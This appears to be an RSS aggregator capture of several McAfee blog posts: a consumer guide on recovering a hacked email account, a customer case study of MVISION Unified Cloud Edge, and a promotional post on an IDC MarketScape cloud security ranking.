McAfee Enterprise offers Threat Intelligence, and Security Operations workshops to provide customers with best practice recommendations on how to utilize their existing security controls to protect against adversarial and insider threats; please reach out if you would like to schedule a workshop with your organization.
The post McAfee Enterprise Defender Blog | CISA Alert: MS Exchange & Fortinet Vulnerabilities appeared first on McAfee Blog.
If you find that your email has been hacked, one of your immediate reactions is wondering what you should next.
The answer: take a deep breath and jump into action. There are five steps can help you prevent or minimize any damage done by a compromised account.
So why do hackers go after email accounts? Fact is, that email account of yours is a treasure trove. There’s a good chance it contains years of correspondence with friends and family, along with yet more email from banks, online retailers, doctors, contractors, business contacts, and more. In all, your email packs a high volume of personal info in one place, which makes your email account a top prize for hackers.
Let’s take a look at how you can take back control of your email account, along with some things you can do to keep it from getting hacked in the first place.
This one speaks for itself. You go to check your email and find that your username and password combination has been rejected. You try again, knowing you’re using the right password, and still no luck. There’s a chance that a hacker has gotten a hold of your password, logged in, and then changed the password—thus locking you out and giving them control of your account.
Hackers often compromise email accounts to spread malware on a large scale. By blasting emails to everyone on your hacked contact list, they can reach dozens, even hundreds, of others with a bogus email that may include an attachment that’s infected with malware. And no doubt about it, some of those emails can look a little odd. They don’t sound or read at all like the person they’re trying to impersonate—you—to the extent that some of your contacts may ask if this email really came from you.
On the flip side, this is a good reason to never open attachments you weren’t expecting. Likewise, if you get a somewhat strange email from a friend or business contact, let them know. You may be the first indication they get that their email has been compromised.
A sluggish device could be a sign of malware in general. The thing with malware is that it tends to act like a system and resource hog, which may cause your device to run slowly, to turn off and on again suddenly, or even run hot. In some cases, the malware is logging keystrokes on your computer or taps on your phone to siphon off things like usernames and passwords so that a hacker can take control of the accounts associated with them—such as your email, not to mention your bank accounts. This makes a strong case for antivirus and antimalware protection that’s automatically kept up to date to protect against the latest threats.
Change your password for your email account if you can. Make it a strong, unique password—don’t reuse a password from another account. Next, update the passwords for other accounts if you use the same or similar passwords for them. (Hackers count on people using simpler and less unique passwords across their accounts—and on people reusing passwords in general.) A password manager that’s included with comprehensive online protection software can do that work for you.
In the case where you’ve been locked out of your account because you think the hacker has changed the password, your email provider should have a webpage dedicated to recovering your account in the event of a lost or stolen password. (For example, Google provides this page for users of Gmail and their other services.) This is a good reason to keep your security questions and alternate contact information current with your provider, as this is the primary way to regain control of your account.
As mentioned above, a big part of the hacker’s strategy is to get their hooks into your address book and spread malware to others. As quickly as you can, send a message to all your email contacts and let them know that your email has been compromised. And if you’ve done so, let them know that you’ve reset your password so that your account is secure again. Likewise alert them that they shouldn’t open any emails or attachments from you that were sent during the time your account was compromised.
Also as mentioned above, there are several ways that a hacker can get a hold of your email account information—one of them by using malware. Give your device a thorough virus scan with comprehensive online protection software to ensure your device is free from malware. Set up a regular scan to run automatically if you haven’t already. That will help keep things clean in the long run.
Sometimes one bad hack leads to another. If someone has access to your email and all the messages in it, they may have what they need to conduct further attacks. Take a look at your other accounts across banking, finances, social media, and other services you use and keep an eye out for any unusual activity.
More broadly speaking, your email account is one of the several pieces that make up the big picture of your online identity. Other important pieces include your online banking accounts, online shopping accounts, and so on. No question about it, these are things you want to keep tabs on.
With that, check your credit report for any signs of strange activity. Your credit report is a powerful tool for spotting identity theft. And in many cases, it’s free to do so. In the U.S., the Fair Credit Reporting Act (FCRA) requires the major credit agencies to provide you with a free credit check at least once every 12 months. Canada provides this service, and the UK has options to receive free reports as well, along with several other nations. It’s a great idea to check your credit report, even if you don’t suspect a problem.
Beyond keeping tabs on your identity, you can protect it as well. Online identity protection such as ours can provide around-the-clock monitoring of your email addresses and bank accounts with up to $1M of ID theft insurance in the event your identity gets compromised. Additionally, it can put an identity recovery pro on the case if you need assistance in the wake of an attack or breach. Taking a step like this can help keep your email account safer from attack in the first place—along with many others as well.
The post My email has been hacked! What should I do next? appeared first on McAfee Blog.
With the acceleration of cloud migration initiatives—partly arising the need to support a remote workforce during the pandemic and beyond—enterprises are finding that this transformation has introduced new operational complexities and security vulnerabilities. Among these are potential misconfigurations, poorly secured interfaces, Shadow IT (access to unauthorized applications), and an increasing number of connected devices and users. To navigate these challenges, enterprises are relying on managed service providers to monitor and protect their cloud environment.
To better serve its customers and secure its own environments, one global technology provider decided to expand its existing on-premises data loss protection (DLP) and web protection with a comprehensive and robust cloud security strategy based on solutions from the MVISION portfolio of solutions. Already a long-time user of McAfee Enterprise on-premises solutions, the global technology provider not only secured its internal cloud infrastructure consisting of more than 5,000 endpoints across over 30 locations worldwide, they also applied the same approach to the millions of endpoints they manage for more than 10,000 customers.
A primary objective for the global technology provider is securing data in the cloud in Software-as-a-Service (SaaS) applications (Microsoft Office 365, OneDrive, Salesforce, and others) and Infrastructure-as-a-Service (IaaS) platforms (Microsoft Azure, Amazon Web Services, Google Cloud Platform).
As a first step in its cloud journey, the global technology provider evaluated a number of cloud access security brokers (CASB) solutions. Ultimately, they decided to implement MVISION Cloud for AWS, Office 365, and Shadow IT. In addition to providing comprehensive visibility into cloud app usage, these solutions help with compliance; data loss prevention (DLP) by monitoring the movement of sensitive and confidential data content traveling to or from the cloud, within the cloud, and cloud to cloud; and detection and remediation of threats primarily through user and entity behavior analytics (UEBA).
But the global technology provider didn’t stop there. When we rolled out MVISION Unified Cloud Edge, the global technology provider tested it and enthusiastically adopted it. As defined by Gartner, MVISION Unified Cloud Edge is an industry-leading example of Secure Access Service Edge (SASE), a security framework that brings together network connectivity and security into a single, cloud-delivered solution that supports business transformation, edge computing, and workforce mobility.
The global technology provider has reaped multiple advantages from this implementation across its own internal environment and for its customers.
MVISION Unified Cloud Edge combines multiple capabilities under one umbrella: CASB functionality with web proxy and DLP with a single administrative hub, ePolicy Orchestrator® (ePO) for streamlined management.
MVISION Unified Cloud Edge capabilities and the ease of integration with the McAfee Enterprise ecosystem has made life easier for the global technology provider’s team, saving time and resources. Now they can set consistent policies from device to cloud and provide users with accelerated and secure access to the tools they use every day, such as Box, Dropbox, and others. As the information security operations manager points out: “A single management console reduces overhead as does being able to set policies that we can sync and apply to multiple data sources on multiple cloud solutions, without having to recreate rules.”
MVISION Unified Cloud Edge has also enabled the global technology provider to further boost its cloud data protection. For example, it can detect data that is improperly managed and stored. Now the organization can apply their existing on-premises data policies to the cloud. For example, they can prevent certain user behaviors that may put both corporate and customer cloud data at risk. These include copying data to cloud apps or USBs, printing it, taking screen captures, accessing risky websites, and uploading data to unauthorized websites.
To create a more secure internal environment, MVISION Unified Cloud Edge has been invaluable for the global security provider. They have a better handle on the applications that are being used across their company. The solution also provides risk scores for the cloud apps that are being used to help steer users away from Shadow IT and toward using only authorized apps. When employees propose new apps to help them do their jobs better, the IT security team can check the security of these apps against requirements and make any necessary modifications to ensure compliance.
“The Shadow IT CASB automatically blocks all cloud services that are deemed high risk, both at our on-premises Web Gateway and the built-in cloud web gateway manager. So, when users attempt to use an unsanctioned SaaS application, they see a message explaining that the app is not safe,” notes the information security operations manager.
The global technology provider also sells SaaS solutions to its clients. With MVISION Unified Cloud Edge, the global technology provider can protect data on any newly sanctioned SaaS applications at no extra cost.”
After a successful experience with McAfee Enterprise overall and specifically with the implementation of MVISION Unified Cloud Edge, the information security operation manager recommends the solution to any organization beginning or in the midst of migrating to the cloud.
“I would advise other companies thinking about their cloud transformation journey to seriously consider MVISION Unified Cloud Edge . . . It has a very user-friendly interface and does so much out of the box,” he asserts. “The level of granularity in policy setting lets you do things you don’t think possible or are much easier to accomplish than you realize. . . I don’t think any other vendor offers such a complete package.”
The post Global Technology Provider Looks to MVISION Unified Cloud Edge appeared first on McAfee Blog.
Cloud Security Gateways (CSGs) are one of the hottest and most sought-after technologies in the market today, driven by the adoption of cloud services for business transformation and the acceptance of hybrid workforce policies. CSGs, also commonly known as Cloud Access Security Brokers (CASBs), are responsible for enforcing security policies to protect cloud-hosted corporate assets from advanced threats, while enabling seamless and secure access to these assets from any location and device.
We have witnessed an exponential growth in cloud usage in the past two years, primarily driven by remote workforce adoption. Based on the data collected by our research team from millions of connected McAfee Enterprise users across the globe, the overall usage of enterprise cloud services spiked by 50% across all industries, while the collaboration services witnessed an increase of up to 600% in usage. This led to an astonishing 630% increase in external attacks on the cloud accounts. Taking all these factors and trends into consideration, CSGs have become a highly essential element of any organization’s cloud security strategy, playing the most critical role for enabling data protection, threat prevention and compliance in the cloud.
McAfee Enterprise continues to innovate in the cloud security space with a laser-focused strategy towards empowering our customers with the best-in-class cloud security solution. MVISION Cloud, recognized as the industry’s leading CSG solution, has become a vital part of enterprise security, allowing organizations to safely migrate to the cloud while protecting their “crown jewels” – the data. A huge testament to our cybersecurity vision is the IDC MarketScape Worldwide Cloud Security Gateways 2021 Vendor Assessment (Doc # US48334521, November 2021), and we are proud to announce that McAfee Enterprise has been recognized as a leader in the report.
According to the report, “McAfee has a strong ecosystem of security solutions, including Secure Web Gateway, CSG, and endpoint security that it can integrate to enable customers in their data loss prevention, User Behavior Analytics, XDR, and threat prevention goals. McAfee has focused on providing robust protection and DLP, with the scale and speed necessary to support large user bases.”
McAfee Enterprise’s multi-vector data protection capabilities go beyond the cloud to uniquely discover and protect sensitive assets on managed endpoints, in-network shares, and on-premises databases, enabling full scope of data protection from device-to-cloud. The industry-leading data protection and threat protection capabilities are tightly integrated with a unified policy framework that allows policy enforcement, data classification and incident management from a centralized console, reducing the cost and complexity of managing hybrid IT deployments, while improving the user experience.
Figure 1: McAfee Enterprise Multi-Vector Data Protection
MVISION Cloud is an integral component of our Unified Cloud Edge (UCE) solution, and together with McAfee Enterprise’s Next-Gen Secure Web Gateway (SWG) and MVISION Private Access (ZTNA) delivers the industry’s most comprehensive Security Services Edge (SSE) solution – the security element of the Secure Access Service Edge (SASE) framework. With McAfee Enterprise’s DLP technology being the common denominator across all the core SSE components, organizations can seamlessly utilize a unified, data-centric framework for centralized visibility and control over their entire digital footprint, while riding on an accelerated path for digital transformation and workplace mobility.
Figure 2: MVISION Unified Cloud Edge (UCE)
Our mission towards building a unified security platform for protecting data from device-to-cloud and defending against advanced threats and adversaries has established McAfee Enterprise as a leader in cybersecurity across multiple forums, and the 2021 IDC MarketScape report is another distinguished feather in our decorated cap.
The post McAfee Enterprise Continues to be a Leader in CASB and Cloud Security appeared first on McAfee Blog.
FreshRSS 